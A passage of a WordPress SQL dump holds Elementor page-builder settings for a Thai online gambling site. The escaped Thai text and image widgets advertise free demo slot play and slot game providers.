\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1460,176,'_elementor_edit_mode','builder'),(1461,176,'_elementor_template_type','wp-page'),(1462,176,'_elementor_version','3.32.5'),(1463,176,'_elementor_pro_version','3.32.3'),(1464,176,'_wp_page_template','default'),(1465,176,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1466,176,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1467,176,'_thumbnail_id','61'),(1471,177,'_elementor_edit_mode','builder'),(1472,177,'_elementor_template_type','wp-page'),(1473,177,'_elementor_version','3.32.5'),(1474,177,'_elementor_pro_version','3.32.3'),(1475,177,'_wp_page_template','default'),(1476,177,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1477,177,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 